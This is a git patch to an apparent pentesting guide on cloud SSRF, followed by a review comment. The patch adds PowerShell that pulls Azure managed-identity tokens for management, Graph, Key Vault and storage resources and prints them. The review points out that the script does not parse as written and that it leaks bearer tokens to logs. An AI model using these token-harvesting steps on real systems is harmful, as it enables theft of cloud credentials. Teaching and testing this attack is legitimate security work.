From 5dea759ed03ce48e1be84ac68a315102bd4fa076 Mon Sep 17 00:00:00 2001
From: SirBroccoli
Date: Tue, 24 Dec 2024 23:35:25 +0000
Subject: [PATCH] GITBOOK-4455: No subject
---
 .../cloud-ssrf.md | 43 +++++++++++++++++++
 1 file changed, 43 insertions(+)
diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
index b6721d66b..b005568df 100644
--- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
@@ -509,6 +509,49 @@ curl "$IDENTITY_ENDPOINT?resource=https://storage.azure.com/&api-version=2019-08
 {% tab title="PS" %}
 {% code overflow="wrap" %}
 ```powershell
+# Define the API version
+$API_VERSION = "2019-08-01"
+
+# Function to get a token for a specified resource
+function Get-Token {
+ param (
+ [string]$Resource
+ )
+ $url = "$IDENTITY_ENDPOINT?resource=$Resource&api-version=$API_VERSION"
+ $headers = @{
+ "X-IDENTITY-HEADER" = $IDENTITY_HEADER
+ }
+ try {
+ $response = Invoke-RestMethod -Uri $url -Headers $headers -Method Get
+ $response.access_token
+ } catch {
+ Write-Error "Error obtaining token for $Resource: $_"
+ }
+}
+
+# Get Management Token
+$managementToken = Get-Token -Resource "https://management.azure.com/"
+Write-Host "Management Token: $managementToken"
+
+# Get Graph Token
+$graphToken = Get-Token -Resource "https://graph.microsoft.com/"
+Write-Host "Graph Token: $graphToken"
+
+# Get Vault Token
+$vaultToken = Get-Token -Resource "https://vault.azure.net/"
+Write-Host "Vault Token: $vaultToken"
+
+# Get Storage Token
+$storageToken = Get-Token -Resource "https://storage.azure.com/"
+Write-Host "Storage Token: $storageToken"
+
+
+
+
+
+
+
+
 # API request in powershell to management endpoint
 $Token = 'eyJ0eX..'
 $URI='https://management.azure.com/subscriptions?api-version=2020-01-01'
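Review bot: The added PowerShell block does not parse as written: in `Write-Error "Error obtaining token for $Resource: $_"` the `$Resource:` is read as a scope-qualified variable reference, so it needs braces, `${Resource}:`. The `$url` line has a related problem, because PowerShell accepts `?` in variable names and `$IDENTITY_ENDPOINT?resource` is expanded as a single (empty) variable. Unlike the Bash tab, environment variables also need the `env:` prefix, e.g. `$url = "${env:IDENTITY_ENDPOINT}?resource=$Resource&api-version=$API_VERSION"` and `"X-IDENTITY-HEADER" = $env:IDENTITY_HEADER`, unless both are assigned elsewhere on the page. The four `Write-Host` lines print complete bearer tokens, which end up in any transcript or console log, so a one-line comment such as `# tokens are bearer credentials: avoid transcripts/shared consoles` would be worth adding. The eight blank lines added before `# API request in powershell to management endpoint` look accidental.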